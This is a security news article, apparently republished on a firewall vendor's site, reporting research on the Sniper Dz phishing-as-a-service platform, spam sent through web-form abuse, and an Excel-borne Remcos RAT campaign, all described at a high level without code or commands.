Phone : +91 95 8290 7788 | Email : sales@itmonteur.net

Register & Request Quote | Submit Support Ticket

Home » Cyber Security News » Vulnerabilities & Exploits » Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials

Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials

Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials

https://firewall.firm.in/wp-content/uploads/2024/10/hacker.png

140,000+ Cyber Attacks

More than 140,000 phishing websites have been found linked to a phishing-as-a-service (PhaaS) platform named Sniper Dz over the past year, indicating that it’s being used by a large number of cybercriminals to conduct credential theft.

“For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages,” Palo Alto Networks Unit 42 researchers Shehroze Farooqi, Howard Tong, and Alex Starov said in a technical report.

“Phishers can either host these phishing pages on Sniper Dz-owned infrastructure or download Sniper Dz phishing templates to host on their own servers.”

Perhaps what makes it even more lucrative is that these services are provided for free. That said, the credentials harvested using the phishing sites are also exfiltrated to the operators of the PhaaS platform, a technique that Microsoft calls double theft.

PhaaS platforms have become an increasingly common way for aspiring threat actors to enter the world of cybercrime, allowing even those with little technical expertise to mount phishing attacks at scale.

Such phishing kits can be purchased off of Telegram, with dedicated channels and groups catering to each and every aspect of the attack chain, right from hosting services to sending phishing messages.

Cybersecurity

Sniper Dz is no exception in that the threat actors operate a Telegram channel with over 7,170 subscribers as of October 1, 2024. The channel was created on May 25, 2020.

Interestingly, a day after the Unit 42 report went live, the people behind the channel have enabled the auto-delete option to automatically clear all posts after one month. This likely suggests an attempt to cover up traces of their activity, although earlier messages remain intact in the chat history.

The PhaaS platform is accessible on the clearnet and requires signing up an account to “get your scams and hack tools,” according to the website’s home page.

A video uploaded to Vimeo in January 2021 shows that the service offers ready-to-use scam templates for various online sites like X, Facebook, Instagram, Skype, Yahoo, Netflix, Steam, Snapchat, and PayPal in English, Arabic, and French languages. The video has more than 67,000 views to date.

The Hacker News has also identified tutorial videos uploaded to YouTube that take viewers through the different steps required to download templates from Sniper Dz and set up fake landing pages for PUBG and Free Fire on legitimate platforms like Google Blogger.

However, it’s not clear if they have any connection to the developers of Sniper Dz, or if they are just customers of the service.

Sniper Dz comes with the ability to host phishing pages on its own infrastructure and provide bespoke links pointing to those pages. These sites are then hidden behind a legitimate proxy server (proxymesh[.]com) to prevent detection.

“The group behind Sniper Dz configures this proxy server to automatically load phishing content from its own server without direct communications,” the researchers said.

“This technique can help Sniper Dz to protect its backend servers, since the victim’s browser or a security crawler will see the proxy server as being responsible for loading the phishing payload.”

The other option for cybercriminals is to download phishing page templates offline as HTML files and host them on their own servers. Furthermore, Sniper Dz offers additional tools to convert phishing templates to the Blogger format that could then be hosted on Blogspot domains.

The stolen credentials are ultimately displayed on an admin panel that can be accessed by logging into the clearnet site. Unit 42 said it observed a surge in phishing activity using Sniper Dz, primarily targeting web users in the U.S., starting in July 2024.

“Sniper Dz phishing pages exfiltrate victim credentials and track them through a centralized infrastructure,” the researchers said. “This could be helping Sniper Dz collect victim credentials stolen by phishers who use their PhaaS platform.”

The development comes as Cisco Talos revealed that attackers are abusing web pages connected to backend SMTP infrastructure, such as account creation form pages and others that trigger an email back to the user, to bypass spam filters and distribute phishing emails.

Cybersecurity

These attacks take advantage of poor input validation and sanitization prevalent on these web forms to include malicious links and text. Other campaigns conduct credential stuffing attacks against mail servers of legitimate organizations so as to gain access to email accounts and send spam.

“Many websites allow users to sign up for an account and log in to access specific features or content,” Talos researcher Jaeson Schultz said. “Typically, upon successful user registration, an email is triggered back to the user to confirm the account.”

“In this case, the spammers have overloaded the name field with text and a link, which is unfortunately not validated or sanitized in any way. The resulting email back to the victim contains the spammer’s link.”

It also follows the discovery of a new email phishing campaign that leverages a seemingly harmless Microsoft Excel document to propagate a fileless variant of Remcos RAT by exploiting a known security flaw (CVE-2017-0199).

“Upon opening the [Excel] file, OLE objects are used to trigger the download and execution of a malicious HTA application,” Trellix researcher Trishaan Kalra said. “This HTA application subsequently launches a chain of PowerShell commands that culminate in the injection of a fileless Remcos RAT into a legitimate Windows process.”

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.


Information Security - InfoSec - Cyber Security - Firewall Providers Company in India

 

 

 

 

 

 

 

 

 

 

 

 

What is Firewall? A Firewall is a network security device that monitors and filters incoming and outgoing network traffic based on an organization's previously established security policies. At its most basic, a firewall is essentially the barrier that sits between a private internal network and the public Internet.

 

Secure your network at the gateway against threats such as intrusions, Viruses, Spyware, Worms, Trojans, Adware, Keyloggers, Malicious Mobile Code (MMC), and other dangerous applications for total protection in a convenient, affordable subscription-based service. Modern threats like web-based malware attacks, targeted attacks, application-layer attacks, and more have had a significantly negative effect on the threat landscape. In fact, more than 80% of all new malware and intrusion attempts are exploiting weaknesses in applications, as opposed to weaknesses in networking components and services. Stateful firewalls with simple packet filtering capabilities were efficient blocking unwanted applications as most applications met the port-protocol expectations. Administrators could promptly prevent an unsafe application from being accessed by users by blocking the associated ports and protocols.

 

Firewall Firm is an IT Monteur Firewall Company provides Managed Firewall Support, Firewall providers , Firewall Security Service Provider, Network Security Services, Firewall Solutions India , New Delhi - India's capital territory , Mumbai - Bombay , Kolkata - Calcutta , Chennai - Madras , Bangaluru - Bangalore , Bhubaneswar, Ahmedabad, Hyderabad, Pune, Surat, Jaipur, Firewall Service Providers in India

Sales Number : +91 95 8290 7788 | Support Number : +91 94 8585 7788
Sales Email : sales@itmonteur.net | Support Email : support@itmonteur.net

Register & Request Quote | Submit Support Ticket